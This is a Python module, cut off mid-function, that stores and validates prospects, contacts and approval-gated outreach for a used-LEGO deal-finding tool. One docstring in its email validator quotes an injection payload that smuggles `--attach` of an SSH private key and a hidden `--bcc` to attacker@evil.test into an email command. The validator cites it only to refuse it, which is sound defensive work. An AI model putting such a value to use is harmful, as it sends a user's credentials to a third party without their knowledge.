#!/usr/bin/env python3
"""Access layer for the prospector tables inside the deal ledger database.

`ledger_db.py` owns the deals DOCUMENT -- load the whole thing, save the whole
thing. The prospect tables are the opposite shape: a run appends one company, one
phone number, one outreach step at a time, and each of those is a targeted write
inside its own transaction. So they live in the same `found_deals.db` file behind
this separate module rather than inside the document layer. `ledger_db.save()`
deletes only `deals` and `source_watermarks`, so a full-document save leaves every
table here intact.

Four tables:
  prospects      a company/venue/event that might yield used LEGO inventory
  contacts       how to reach one prospect -- phone, email, form URL, address
  outreach       one approval-gated conversation with one contact
  prospect_runs  what a run explored, INCLUDING explorations that found nothing

Validation raises here, in the access layer, rather than in a separate validator
script. Every raise names the offending value and the fix, and no write silently
substitutes a default: a prospect with no citation URL, no contact channel, or an
unregistered hypothesis type is an unfinished capture, not a lead.

    legoscout prospects        # counts by status/state, plus the run count
    legoscout prospects 7      # one prospect with its contacts and outreach
"""

from __future__ import annotations

from .. import paths
import json
import math
import re
import sqlite3
import sys
from datetime import datetime, timezone
from typing import Any

from . import fulfillment as available_fulfillment  # bare sibling import: same convention deals use
from . import db as ledger_db  # bare sibling import: this file sits next to ledger_db.py

# The hypothesis registry lives in the prospector skill, next to the JSON it
# reads. Importing it here is what makes an unregistered hypothesis type
# impossible to store, rather than merely discouraged in a document.

from ..prospector import hypothesis_types  # noqa: E402  registry gate: raises on unregistered types

DB_PATH = ledger_db.DB_PATH

# The prospect area is generated by build_pickup_area.py and owns its own radius.
# Restating 60.0 here would let the two drift, so the number is read from the
# file the caller resolved `distance_miles` against. Read once, at import: a
# missing or malformed area file is a broken install, not a runtime branch.
PROSPECT_AREA_PATH = paths.PROSPECT_AREA_JSON
with open(PROSPECT_AREA_PATH, encoding="utf-8") as _area_file:
    RADIUS_MILES: float = float(json.load(_area_file)["radius_miles"])

PROSPECT_STATUSES: tuple[str, ...] = ("active", "rejected", "dead")

# A contact needs at least one of these. A name with no way to reach it is a
# note, not a contact.
CONTACT_CHANNELS: tuple[str, ...] = ("phone", "email", "form_url", "address")

OUTREACH_STATES: tuple[str, ...] = (
    "draft",
    "approved",
    "rejected",
    "sent",
    "cancelled",
    "replied",
    "no_reply",
    "closed",
)

OUTCOMES: tuple[str, ...] = ("deal", "declined", "no_inventory")

# The state machine. The database stays plain text; this map is the ONLY
# enforcement, and this constant is the SOURCE OF TRUTH. Its one documentation
# restatement lives in legoscout-prospector/references/prospect-contract.md.
# `draft -> approved` IS Adam's per-action approval gate: nothing reaches `sent`
# without passing through it.
TRANSITIONS: dict[str, tuple[str, ...]] = {
    "draft": ("approved", "rejected"),
    "approved": ("sent", "cancelled"),
    "sent": ("replied", "no_reply"),
    "replied": ("closed",),
    # Terminal. An empty tuple means there is nothing legal to advance to, so a
    # new outreach row is the only way forward.
    "rejected": (),
    "cancelled": (),
    "no_reply": (),
    "closed": (),
}

# `distance_miles` and `available_fulfillment` are NOT here -- they are a
# pair, validated together below, because whether distance_miles is required
# (and what it must be) depends on what available_fulfillment says.
_REQUIRED_PROSPECT_KEYS: tuple[str, ...] = (
    "name",
    "hypothesis_type",
    "citation_url",
    "location",
)

_EVENT_DATE_FORMAT = "%Y-%m-%d"


class ProspectError(ValueError):
    """A prospect write was refused.

    Deliberately loud. The prospector's whole value is that every stored row is
    evidence-backed, so a row that cannot pass this layer must not reach the
    database in a weaker form.
    """


class DuplicateProspect(ProspectError):
    """The prospect is already recorded. The message names the existing id."""


class IllegalTransition(ProspectError):
    """The outreach state machine forbids this advance.

    The message lists the legal next states, or -- from a terminal state, which
    has none -- names the current state.
    """


# --- schema ----------------------------------------------------------------

# `distance_miles` carries no datatype on purpose: BLOB affinity, the
# ledger_db._NUMERIC convention, so 12.4 stays 12.4 and 12.0 stays 12.0.
# AUTOINCREMENT on prospects prevents rowid reuse, so a deleted prospect's id
# can never be silently reassigned under deals.prospect_id.
# Foreign keys BETWEEN these new tables are declared and enforced --
# ledger_db.connect() sets foreign_keys=ON. (deals.prospect_id deliberately has
# no declared FK; see the SCALAR_FIELDS comment in ledger_db.py.)
# `searches` is a JSON array stored as text.
# `status` and `state` carry no DDL DEFAULT: every insert sets them explicitly,
# because a default would quietly stand in for a value the caller forgot.
# `uq_prospects_name_location` is the DATABASE-level dedupe backstop. The key is
# COMPOSITE on purpose: a chain runs more than one branch inside the 60-mile
# radius, and each branch is its own prospect with its own phone and manager. A
# name-only key silently lost every branch after the first. The
# access layer's `_match_duplicate` check is the raise surface with the useful
# message; this index is what makes a second row impossible even for a writer
# that never runs that check. It is also the ONLY index on `name_normalized`: a
# UNIQUE index serves every lookup a plain one serves, so a second index on the
# same column bought nothing and cost a B-tree write on every insert and update.
_SCHEMA = """
CREATE TABLE IF NOT EXISTS prospects (
    prospect_id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    name_normalized TEXT NOT NULL,
    hypothesis_type TEXT NOT NULL,
    citation_url TEXT NOT NULL,
    location TEXT NOT NULL,
    location_normalized TEXT NOT NULL,
    distance_miles,
    available_fulfillment TEXT,
    domain TEXT,
    event_date TEXT,
    status TEXT NOT NULL,
    is_favorite INTEGER NOT NULL,
    notes TEXT,
    created_at TEXT NOT NULL,
    updated_at TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS contacts (
    contact_id INTEGER PRIMARY KEY AUTOINCREMENT,
    prospect_id INTEGER NOT NULL REFERENCES prospects(prospect_id),
    person_name TEXT,
    role TEXT,
    phone TEXT,
    phone_normalized TEXT,
    email TEXT,
    form_url TEXT,
    address TEXT,
    notes TEXT,
    created_at TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS outreach (
    outreach_id INTEGER PRIMARY KEY AUTOINCREMENT,
    prospect_id INTEGER NOT NULL REFERENCES prospects(prospect_id),
    contact_id INTEGER NOT NULL REFERENCES contacts(contact_id),
    state TEXT NOT NULL,
    outcome TEXT,
    subject TEXT,
    body TEXT,
    note TEXT,
    sent_message_id TEXT,
    created_at TEXT NOT NULL,
    updated_at TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS prospect_runs (
    run_id INTEGER PRIMARY KEY AUTOINCREMENT,
    run_key TEXT NOT NULL,
    hypothesis_type TEXT NOT NULL,
    searches TEXT NOT NULL,
    result_count INTEGER NOT NULL,
    notes TEXT,
    recorded_at TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_prospects_status ON prospects(status);
CREATE UNIQUE INDEX IF NOT EXISTS uq_prospects_name_location
    ON prospects(name_normalized, location_normalized);
CREATE INDEX IF NOT EXISTS idx_outreach_open
    ON outreach(prospect_id, contact_id, state);
CREATE INDEX IF NOT EXISTS idx_prospects_domain ON prospects(domain);
CREATE INDEX IF NOT EXISTS idx_contacts_prospect ON contacts(prospect_id);
CREATE INDEX IF NOT EXISTS idx_outreach_prospect ON outreach(prospect_id);
CREATE INDEX IF NOT EXISTS idx_outreach_state ON outreach(state);
CREATE INDEX IF NOT EXISTS idx_prospect_runs_key ON prospect_runs(run_key);
"""


# The identity column of each table above. Every one of them is named after its
# own table -- `run_id`, never `id` -- so a caller that assumes a bare `id`
# column produces `no such column: id` at query time rather than at import.
# Anything that orders, selects or looks up by identity reads the key from here,
# so the key is declared exactly once, beside the DDL that creates it.
# `tests/test_prospect_schema_contract.py` asserts this map against
# PRAGMA table_info, so a renamed key cannot drift away from its declaration.
PRIMARY_KEYS: dict[str, str] = {
    "prospects": "prospect_id",
    "contacts": "contact_id",
    "outreach": "outreach_id",
    "prospect_runs": "run_id",
}


# Every object _SCHEMA creates. sqlite_master is checked against this list
# before the script runs, so a database already at the current shape takes no
# write lock. Adding DDL to _SCHEMA means adding its object name here.
_SCHEMA_OBJECTS: tuple[str, ...] = (
    "prospects",
    "contacts",
    "outreach",
    "prospect_runs",
    "idx_prospects_status",
    "uq_prospects_name_location",
    "idx_outreach_open",
    "idx_prospects_domain",
    "idx_contacts_prospect",
    "idx_outreach_prospect",
    "idx_outreach_state",
    "idx_prospect_runs_key",
)


# Objects an EARLIER version of _SCHEMA created and this one does not. A
# database built by that version still carries them, so naming them here is what
# gets them dropped. `idx_prospects_name_normalized` duplicated
# `uq_prospects_name_normalized` on the same column: the UNIQUE index answers
# every lookup the plain one answered, so the plain one was pure write cost.
# Removing DDL from _SCHEMA means moving its object name here, not deleting it.
_STALE_SCHEMA_OBJECTS: tuple[str, ...] = (
    "idx_prospects_name_normalized",
    "uq_prospects_name_normalized",
)

_DROP_STALE_SCHEMA = "".join(
    "DROP INDEX IF EXISTS %s;\n" % name for name in _STALE_SCHEMA_OBJECTS)


# Columns a later _SCHEMA added to a table an EARLIER _SCHEMA already created.
# The check above reads sqlite_master, which carries the table name either way,
# so it cannot see a column that is missing from an existing table. Every entry
# here must also appear in _SCHEMA, so a fresh database gets the column from the
# CREATE and an older one gets it from the ALTER.
#
# `ALTER TABLE ... ADD COLUMN` is additive: existing rows get NULL and no row is
# rewritten. Only add a NULLable column here -- SQLite refuses a NOT NULL column
# without a default, and a default would be the fallback value this project
# bans.
_ADDED_COLUMNS: tuple[tuple[str, str, str], ...] = (
    # `subject` landed after `body`. Adam approves a subject line as well as a
    # body, so storing only the body left half of what he approved unrecorded,
    # and forced the subject onto a command line at send time.
    ("outreach", "subject", "TEXT"),
    # Every prospect before this column existed was captured under the old
    # local-only regime -- distance_miles was required and bounded to 60
    # miles for every row, so every one of them is a real local_pickup
    # candidate. A one-time backfill (not this ALTER) sets that value on the
    # rows this ADD COLUMN leaves NULL; see the module docstring.
    ("prospects", "available_fulfillment", "TEXT"),
    # The page's ★ favorite star on a prospect row. Same shape as the sellers
    # table's flag: INTEGER 0/1 set explicitly by every insert (no DDL
    # default), NULLable via ALTER for rows written before it existed.
    ("prospects", "is_favorite", "INTEGER"),
)


def _missing_columns(conn: sqlite3.Connection) -> list[tuple[str, str, str]]:
    """Every _ADDED_COLUMNS entry this database does not have yet.

    A table that does not exist at all is skipped: _SCHEMA is about to create
    it with the column already in place.
    """
    missing = []
    for table, column, decl in _ADDED_COLUMNS:
        have = {row[1] for row in conn.execute("PRAGMA table_info(%s)" % table)}
        if have and column not in have:
            missing.append((table, column, decl))
    return missing


def _ensure_prospect_schema(conn: sqlite3.Connection) -> None:
    """Create the four tables and their indexes if this database predates them,
    and drop what a later _SCHEMA stopped creating.

    Idempotent -- it runs on every connect, including against the live ledger.
    It touches nothing but the objects named in _SCHEMA_OBJECTS and
    _STALE_SCHEMA_OBJECTS, so no row of data can be lost here.

    sqlite_master is read FIRST, and DDL runs only when the database actually
    disagrees with this module. `CREATE ... IF NOT EXISTS` and `DROP ... IF
    EXISTS` each take a write lock whenever there is work to do, and connect()
    is on every read path, so running either script unconditionally made a pure
    reader block behind any concurrent writer and fail on a migration it did not
    need.
    """
    have = {row[0] for row in conn.execute("SELECT name FROM sqlite_master")}
    missing = [name for name in _SCHEMA_OBJECTS if name not in have]
    stale = [name for name in _STALE_SCHEMA_OBJECTS if name in have]
    columns = _missing_columns(conn)
    if not missing and not stale and not columns:
        return
    if missing:
        conn.executescript(_SCHEMA)
    if stale:
        conn.executescript(_DROP_STALE_SCHEMA)
    for table, column, decl in columns:
        conn.execute("ALTER TABLE %s ADD COLUMN %s %s" % (table, column, decl))
    conn.commit()


def connect(path: str = DB_PATH) -> sqlite3.Connection:
    """A ledger_db connection with the prospect schema guaranteed present."""
    conn = ledger_db.connect(path)
    _ensure_prospect_schema(conn)
    return conn


# --- normalizers -----------------------------------------------------------


def _now() -> str:
    """UTC, ISO-8601, with the offset. Local time here would make two runs on
    two machines disagree about which record is newer."""
    return datetime.now(timezone.utc).isoformat()


def _today() -> str:
    return datetime.now(timezone.utc).date().isoformat()


def normalize_name(text: str) -> str:
    """Lowercase, punctuation to space, whitespace collapsed.

    'Test,  Estate   Co. ' and 'TEST  estate co' are the same company; the
    dedupe check compares this form.

    Raises when nothing survives. The regex deletes every character outside
    [a-z0-9], so a fully non-ASCII name reduces to `''` -- and `'' = ''` made
    every such prospect a duplicate of the first one.
    """
    normalized = re.sub(r"[^a-z0-9]+", " ", str(text).lower()).strip()
    if not normalized:
        raise ProspectError(
            "name %r normalizes to an empty dedupe key -- the key keeps only "
            "[a-z0-9], so this name cannot identify a prospect or be compared "
            "against a stored one; record the company's romanized or English "
            "trading name" % (text,))
    return normalized


def normalize_location(text: str) -> str:
    """The location half of the composite dedupe key.

    Same shape as normalize_name: lowercase, everything outside [a-z0-9] to a
    space, whitespace collapsed. So "  owensboro,   ky " and "Owensboro, KY" are
    one place, while Evansville and Owensboro stay two.
    """
    normalized = re.sub(r"[^a-z0-9]+", " ", str(text).lower()).strip()
    if not normalized:
        raise ProspectError(
            "location %r normalizes to an empty dedupe key -- the key keeps only "
            "[a-z0-9], so this location cannot separate one branch of a chain "
            "from another; record a state-qualified location" % (text,))
    return normalized


# Terminal states carry an empty tuple in TRANSITIONS, so they are derived, never
# restated. A conversation in one of these is finished; a later run may open a
# fresh one against the same contact.
_TERMINAL_STATES: frozenset[str] = frozenset(
    state for state, nxt in TRANSITIONS.items() if not nxt)


# An extension reaches a desk behind a switchboard. It is not part of the
# subscriber number, so it must come off before the digits are taken -- appended
# to them it silently defeats the duplicate check.
_EXTENSION = re.compile(r"(?i)\s*(?:ext|extn|extension|x)\s*\.?\s*(\d+)\s*$")


def normalize_phone(text: str) -> str:
    """Digits only, with an extension, an IDD prefix and a US country code off.

    An 11-digit number that does NOT start with 1 keeps every digit -- it is an
    international number, not a US number wearing a prefix. The value is NOT
    truncated to ten digits here; `_match_duplicate` compares the ten-digit
    suffix, so the stored form keeps everything the source published.
    """
    raw = str(text)
    subscriber = _EXTENSION.sub("", raw)
    digits = re.sub(r"\D", "", subscriber)
    # International direct dialing prefixes. '011' is the North American one and
    # '00' the ITU one; both prepend to the number and neither is part of it.
    if digits.startswith("011"):
        digits = digits[3:]
    elif digits.startswith("00"):
        digits = digits[2:]
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]
    if not digits:
        raise ProspectError(
            "phone %r holds no digits -- a channel nobody can dial is not a "
            "contact channel; record the dialable number, or leave the phone "
            "key out and record email/form_url/address instead" % (text,))
    return digits


def normalize_domain(url_or_domain: str) -> str:
    """The registrable host, lowercased, without `www.`.

    Accepts a full URL or a bare domain, because a citation URL and a hand-typed
    company domain have to compare equal.
    """
    text = str(url_or_domain).strip().lower()
    if "//" in text:
        text = text.split("//", 1)[1]
    text = re.split(r"[/?#]", text, maxsplit=1)[0]
    if "@" in text:
        text = text.split("@", 1)[1]
    if ":" in text:
        text = text.split(":", 1)[0]
    # A trailing dot is the DNS root label. 'example.com.' and 'example.com' are
    # the same host, and keeping the dot let one company be stored twice.
    text = text.rstrip(".")
    if text.startswith("www."):
        text = text[4:]
    if not text:
        raise ProspectError(
            "%r has no host -- pass a full URL or a bare domain, so the dedupe "
            "check can compare it against the stored one" % (url_or_domain,))
    return text


# --- validation ------------------------------------------------------------


# The remediation every field read off a citation page shares.
_CITATION_REMEDY = "read it off the citation rather than leaving it blank"

# `run_key` is not read off a citation -- it is stamped by the run itself, and
# it is what lets a zero-result exploration be attributed to one run.
_RUN_KEY_REMEDY = (
    "a run_key is the YYYYMMDDTHHMMSSZ UTC stamp of the run that produced this "
    "exploration; build it with "
    "datetime.now(timezone.utc).strftime('%Y%m%dT%H%M%SZ')"
)


def _require_text_value(value, key: str, owner: str, remedy: str) -> str:
    """The one text rule: a non-empty string, stripped, or a named raise."""
    if not isinstance(value, str) or not value.strip():
        raise ProspectError(
            "%s %r must be a non-empty string, got %r -- %s"
            % (owner, key, value, remedy))
    return value.strip()


def _require_text(container: dict, key: str, owner: str, remedy: str) -> str:
    if key not in container:
        raise ProspectError(
            "%s is missing %r -- record it from the citation before storing the "
            "%s, rather than storing a partial row" % (owner, key, owner))
    return _require_text_value(container[key], key, owner, remedy)


def _validate_prospect(prospect: dict) -> dict:
    """Return the cleaned column values for one prospect, or raise."""
    for key in _REQUIRED_PROSPECT_KEYS:
        if key not in prospect:
            raise ProspectError(
                "prospect is missing %r -- every prospect needs %s, so a row "
                "without it is an unfinished capture, not a lead"
                % (key, ", ".join(_REQUIRED_PROSPECT_KEYS)))

    name = _require_text(prospect, "name", "prospect", _CITATION_REMEDY)
    location = _require_text(prospect, "location", "prospect", _CITATION_REMEDY)
    citation_url = _require_text(prospect, "citation_url", "prospect", _CITATION_REMEDY)
    if not citation_url.startswith(("http://", "https://")):
        raise ProspectError(
            "citation_url %r is not a live http(s) URL -- store the page you "
            "actually read the prospect off, so the claim can be re-checked"
            % (citation_url,))

    # `available_fulfillment` decides whether distance_miles applies at all.
    # A source that only ships is not disqualified by geography -- Adam can
    # receive its inventory from anywhere, so the 60-mile table has nothing to
    # say about it.
    if "available_fulfillment" not in prospect or prospect["available_fulfillment"] is None:
        raise ProspectError(
            "prospect is missing 'available_fulfillment' -- record how this "
            "prospect can be reached: a non-empty subset of %s, read off the "
            "source rather than assumed (does it sell in person, does it ship "
            "orders, or both)" % "/".join(available_fulfillment.VALUES))
    try:
        fulfillment = available_fulfillment.normalize(prospect["available_fulfillment"])
    except ValueError as exc:
        raise ProspectError(str(exc)) from exc

    distance_miles = prospect.get("distance_miles")
    if available_fulfillment.LOCAL_PICKUP in fulfillment:
        if distance_miles is None:
            raise ProspectError(
                "prospect offers local_pickup but has no distance_miles -- "
                "resolve one with pickup_area.resolve(location, "
                "area_path=paths.PROSPECT_AREA_JSON); "
                "this module never guesses geography")
        if isinstance(distance_miles, bool) or not isinstance(distance_miles, (int, float)):
            raise ProspectError(
                "distance_miles must be a number, got %r -- resolve it with "
                "pickup_area.resolve(location, "
                "area_path=paths.PROSPECT_AREA_JSON); this module never "
                "guesses geography" % (distance_miles,))
        # NaN and Inf are floats, so the isinstance check above passes them.
        # SQLite then stores NaN as NULL, which turns a real distance into a
        # missing value that every reader reports as unknown.
        if not math.isfinite(distance_miles):
            raise ProspectError(
                "distance_miles %r is not a finite number -- SQLite stores NaN "
                "as NULL, so this would erase the only distance the prospect "
                "has; resolve a real mileage with pickup_area.resolve(location, "
                "area_path=%s)" % (distance_miles, PROSPECT_AREA_PATH))
        if not 0 <= distance_miles <= RADIUS_MILES:
            raise ProspectError(
                "distance_miles %r is outside the 0..%s mile prospect area -- "
                "pickup_area.resolve(location, area_path=%s) returns a distance "
                "inside that radius, and a location outside it is not a "
                "local_pickup candidate"
                % (distance_miles, RADIUS_MILES, PROSPECT_AREA_PATH))
    elif distance_miles is not None:
        raise ProspectError(
            "prospect does not offer local_pickup (available_fulfillment=%r), "
            "so distance_miles must be left out -- a ship-only prospect is not "
            "gated by the 60-mile radius" % (list(fulfillment),))

    hypothesis_type_raw = _require_text(prospect, "hypothesis_type", "prospect", _CITATION_REMEDY)
    _require_registered_type(hypothesis_type_raw)
    hypothesis_type = hypothesis_types.type_key(hypothesis_type_raw)

    event_date = _validate_event_date(prospect)

    notes = None
    if "notes" in prospect and prospect["notes"] is not None:
        notes = str(prospect["notes"])

    # `domain` is the COMPANY's own website host, and it is OPTIONAL. It is
    # never derived from `citation_url`: a citation URL is the directory page the
    # prospect was read off, so both registered hypothesis types cite one shared
    # host. Deriving identity from it made every company on estatesales.net a
    # duplicate of the first one. Unknown stays NULL, and `_match_duplicate`
    # skips a NULL domain rather than matching on it.
    domain = None
    if "domain" in prospect and prospect["domain"] is not None:
        domain = normalize_domain(prospect["domain"])

    return {
        "name": name,
        "name_normalized": normalize_name(name),
        "location_normalized": normalize_location(location),
        "hypothesis_type": hypothesis_type,
        "citation_url": citation_url,
        "location": location,
        "distance_miles": distance_miles,
        "available_fulfillment": json.dumps(list(fulfillment)),
        "domain": domain,
        "event_date": event_date,
        "notes": notes,
    }


def _require_registered_type(value: str) -> None:
    """Gate the hypothesis registry, raising the module's own error class.

    `hypothesis_types.entry` raises `KeyError`, and its message is the right
    one, so it is kept verbatim. Only the CLASS changes: every other refusal in
    this module is a `ProspectError`, and a caller guarding on that class used
    to walk straight past an unregistered type. Found by the first live
    prospect run, 2026-08-02.
    """
    try:
        hypothesis_types.entry(value)
    except KeyError as exc:
        # exc.args[0] is the registry's own remediation text. KeyError's str()
        # adds quotes around it, so read the argument instead.
        raise ProspectError(exc.args[0]) from exc


def _validate_event_date(prospect: dict) -> str | None:
    """`event_date` is optional; when present it must be a real future-or-today
    ISO date. Today is NOT past -- a sale running today is still workable."""
    if "event_date" not in prospect or prospect["event_date"] is None:
        return None
    raw = prospect["event_date"]
    try:
        parsed = datetime.strptime(str(raw), _EVENT_DATE_FORMAT).date()
    except (ValueError, TypeError):
        raise ProspectError(
            "event_date %r is not a YYYY-MM-DD date -- store the calendar date "
            "from the listing in ISO form so it sorts and expires correctly"
            % (raw,)) from None
    if parsed.isoformat() < _today():
        raise ProspectError(
            "event_date %s is already past -- a finished event is not a "
            "prospect; record the next scheduled date instead" % (raw,))
    return parsed.isoformat()


# ONE plain address, nothing else. Deliberately narrower than RFC 5322: this
# value is read off a page the PROSPECT controls, and it is later interpolated
# into a `google gmail send --to ...` command line and into an RFC-822 header.
# A local part of unreserved characters, one "@", and a dotted domain is the
# whole grammar. Anything a shell or a header parser could read as structure --
# a space, comma, semicolon, quote, backtick, pipe, dollar, newline, a leading
# dash that argparse would read as a flag -- is simply not in the character set.
_PLAIN_EMAIL = re.compile(
    r"\A[A-Za-z0-9_](?:[A-Za-z0-9_.+-]*[A-Za-z0-9_+-])?"
    r"@[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+\Z")


def _require_plain_email(text: str, contact: dict) -> None:
    """Raise unless `text` is exactly one plain email address.

    A prospect publishes its own contact address, so this string is untrusted
    input on its way to a command line. `office@venue.example --attach
    /Users/adam/.ssh/id_rsa --bcc attacker@evil.test` is a real address-shaped
    payload: `--attach` mails a local file and `--bcc` adds a recipient Adam is
    never shown. `office@venue.example, attacker@evil.test` smuggles a second
    recipient through the header even when the shell argument is quoted.
    Storing either one is the bug; refusing it here is the fix.
    """
    if not _PLAIN_EMAIL.match(text):
        raise ProspectError(
            "contact email %r is not one plain address -- it must be a single "
            "address such as office@venue.example, with no space, comma, "
            "semicolon, quote, second @, CLI flag, or shell character. That "
            "value is interpolated into a `google gmail send --to` command, so "
            "anything else is a command-injection or a hidden second recipient. "
            "Record the real address, or leave the email key out and use "
            "another channel. (contact: %r)" % (text, contact))


def _validate_contact(contact: dict) -> dict:
    """Return the cleaned column values for one contact, or raise."""
    if not isinstance(contact, dict):
        raise ProspectError(
            "a contact must be a dict of %s, got %r"
            % ("/".join(CONTACT_CHANNELS), contact))
    values: dict[str, str | None] = {}
    for channel in CONTACT_CHANNELS:
        if channel not in contact or contact[channel] is None:
            values[channel] = None
            continue
        text = str(contact[channel]).strip()
        if not text:
            # A blank channel is a capture that went wrong, not a channel the
            # prospect does not have. Omit the key instead.
            raise ProspectError(
                "contact %r carries a blank %r -- record the real value or "
                "leave the key out entirely" % (contact, channel))
        values[channel] = text
    if not any(values[channel] for channel in CONTACT_CHANNELS):
        raise ProspectError(
            "contact %r carries none of %s -- a name with no way to reach it "
            "cannot produce a deal, so record at least one channel"
            % (contact, "/".join(CONTACT_CHANNELS)))

    if values["email"] is not None:
        _require_plain_email(values["email"], contact)

    phone = values["phone"]
    out = {
        "person_name": contact["person_name"] if "person_name" in contact else None,
        "role": contact["role"] if "role" in contact else None,
        "phone": phone,
        "phone_normalized": normalize_phone(phone) if phone else None,
        "email": values["email"],
        "form_url": values["form_url"],
        "address": values["address"],
        "notes": contact["notes"] if "notes" in contact else None,
    }
    return out


# --- duplicate matching ----------------------------------------------------


def _match_duplicate(
    conn: sqlite3.Connection,
    name: str,
    location: str | None = None,
    phone: str | None = None,
    domain: str | None = None,
) -> int | None:
    """THE three-way duplicate match: normalized name, domain, contact phone.

    This is the only place the match SQL exists. `find_duplicate` reports on it;
    `insert_prospect` calls it after `BEGIN IMMEDIATE`, so the write lock is
    already held and the check cannot be overtaken by a concurrent insert. This
    function itself takes no lock -- calling it outside a write transaction, as
    `find_duplicate` does, reports a snapshot that another writer may already
    have invalidated.
    """
    name_normalized = normalize_name(name)
    # The name is identity only WITHIN one location. Without a location the
    # caller cannot ask the precise question, so the name clause widens to
    # name-only -- a BROADER report, which is what find_duplicate is for.
    # insert_prospect always passes one, so the stored key is always composite.
    location_normalized = normalize_location(location) if location else None
    phone_normalized = normalize_phone(phone) if phone else None
    domain_normalized = normalize_domain(domain) if domain else None
    # A NULL or empty key is the ABSENCE of that key, not a value two prospects
    # can share. Every clause below is guarded on both sides, so `'' = ''` can
    # never collapse two unrelated companies into one match.
    row = conn.execute(
        "SELECT p.prospect_id FROM prospects p "
        " WHERE (:name <> '' AND p.name_normalized = :name"
        "        AND (:location IS NULL OR p.location_normalized = :location))"
        # The domain is scoped by location for the SAME reason the name is. A
        # franchise publishes ONE website for every branch, so
        # `onceuponachild.com` belongs to the Evansville store and the Newburgh
        # store alike. Matching on it alone refused every branch after the
        # first, and the 2026-08-02 prospect run had to store `domain` as NULL
        # on two real prospects to work around it.
        "    OR (:domain IS NOT NULL AND :domain <> '' AND p.domain = :domain"
        "        AND (:location IS NULL OR p.location_normalized = :location))"
        "    OR (:phone IS NOT NULL AND :phone <> '' AND EXISTS ("
        "          SELECT 1 FROM contacts c"
        "           WHERE c.prospect_id = p.prospect_id"
        "             AND c.phone_normalized IS NOT NULL"
        "             AND c.phone_normalized <> ''"
        # The subscriber number is the identity. An extension or an IDD prefix
        # changes the digit string without changing who answers, so the match is
        # on the last ten digits once both sides are long enough to have them.
        "             AND (c.phone_normalized = :phone"
        "                  OR (length(:phone) >= 10"
        "                      AND length(c.phone_normalized) >= 10"
        "                      AND substr(c.phone_normalized, -10)"
        "                          = substr(:phone, -10)))))"
        " ORDER BY p.prospect_id LIMIT 1",
        {"name": name_normalized, "location": location_normalized,
         "domain": domain_normalized, "phone": phone_normalized},
    ).fetchone()
    if row is None:
        return None
    return row[0]


def find_duplicate(
    name: str,
    location: str | None = None,
    phone: str | None = None,
    domain: str | None = None,
    path: str = DB_PATH,
) -> int | None:
    """Report whether a prospect already matches, without raising.

    For reporting and triage only. Decision code calls `insert_prospect()` and
    lets IT raise `DuplicateProspect`, so the check and the write share one
    transaction.

    Pass `location` to ask the precise question the stored key answers: this
    name, in this town. Omit it and the name clause widens to name-only, which
    reports every branch of a chain -- broader on purpose, since triage wants
    to see them all.
    """
    conn = connect(path)
    try:
        return _match_duplicate(conn, name, location=location,
                                phone=phone, domain=domain)
    finally:
        conn.close()


# --- writes ----------------------------------------------------------------


def insert_prospect(
    prospect: dict,
    contacts: list[dict],
    path: str = DB_PATH,
) -> int:
    """Store one prospect and all its contacts in ONE write transaction.

    Everything is validated before the transaction opens, so a bad contact in
    the list leaves no prospect row and no orphan contact behind.

    The transaction is opened with an explicit `BEGIN IMMEDIATE`, NOT with
    `with conn:`. Python's sqlite3 legacy isolation begins a transaction only
    before the first DML statement, so under `with conn:` the dedupe SELECT ran
    in autocommit and two concurrent callers both passed it and both committed.
    `BEGIN IMMEDIATE` takes the write lock before `_match_duplicate` runs, so the
    check and the insert are one unit. `uq_prospects_name_location` is the
    backstop under that, and its IntegrityError is translated to
    `DuplicateProspect` here.
    """
    columns = _validate_prospect(prospect)
    if not isinstance(contacts, list) or not contacts:
        raise ProspectError(
            "prospect %r has no contacts -- the evidence bar is a citation URL "
            "plus at least one usable contact channel (%s); an uncontactable "
            "lead can never produce a deal"
            % (columns["name"], "/".join(CONTACT_CHANNELS)))
    contact_rows = [_validate_contact(c) for c in contacts]

    stamp = _now()
    conn = connect(path)
    try:
        conn.execute("BEGIN IMMEDIATE")
        try:
            probes: list[str | None] = [None]
            probes.extend(r["phone"] for r in contact_rows if r["phone"])
            for probe in probes:
                existing = _match_duplicate(
                    conn, columns["name"], location=columns["location"],
                    phone=probe, domain=columns["domain"])
                if existing is not None:
                    raise DuplicateProspect(
                        "prospect %r is a duplicate: it matches existing "
                        "prospect_id %d (same name in the same location, same "
                        "domain in the same location, or a shared contact "
                        "phone) -- update that row with "
                        "update_prospect_status/insert_contact instead of "
                        "storing the same source twice"
                        % (columns["name"], existing))
            try:
                cur = conn.execute(
                    "INSERT INTO prospects (name, name_normalized, hypothesis_type, "
                    "citation_url, location, location_normalized, distance_miles, "
                    "available_fulfillment, domain, event_date, status, "
                    "is_favorite, notes, created_at, updated_at) "
                    "VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
                    (
                        columns["name"],
                        columns["name_normalized"],
                        columns["hypothesis_type"],
                        columns["citation_url"],
                        columns["location"],
                        columns["location_normalized"],
                        columns["distance_miles"],
                        columns["available_fulfillment"],
                        columns["domain"],
                        columns["event_date"],
                        "active",
                        0,
                        columns["notes"],
                        stamp,
                        stamp,
                    ),
                )
            except sqlite3.IntegrityError as exc:
                # The UNIQUE backstop fired, which means a writer that never ran
                # `_match_duplicate` stored this company first. Translated, not
                # suppressed: an IntegrityError names a constraint, not the thing
                # the caller has to fix.
                raise DuplicateProspect(
                    "prospect %r collides with the UNIQUE index on "
                    "prospects.name_normalized (%r) -- another writer stored "
                    "the same company first; find it with find_duplicate(%r) "
                    "and update that row with update_prospect_status/"
                    "insert_contact instead of storing the same source twice"
                    % (columns["name"], columns["name_normalized"],
                       columns["name"])) from exc
            prospect_id = cur.lastrowid
            for row in contact_rows:
                _insert_contact_row(conn, prospect_id, row, stamp)
            conn.commit()
            return prospect_id
        except BaseException:
            conn.rollback()
            raise
    finally:
        conn.close()


def _insert_contact_row(
    conn: sqlite3.Connection,
    prospect_id: int,
    row: dict,
    stamp: str,
) -> int:
    cur = conn.execute(
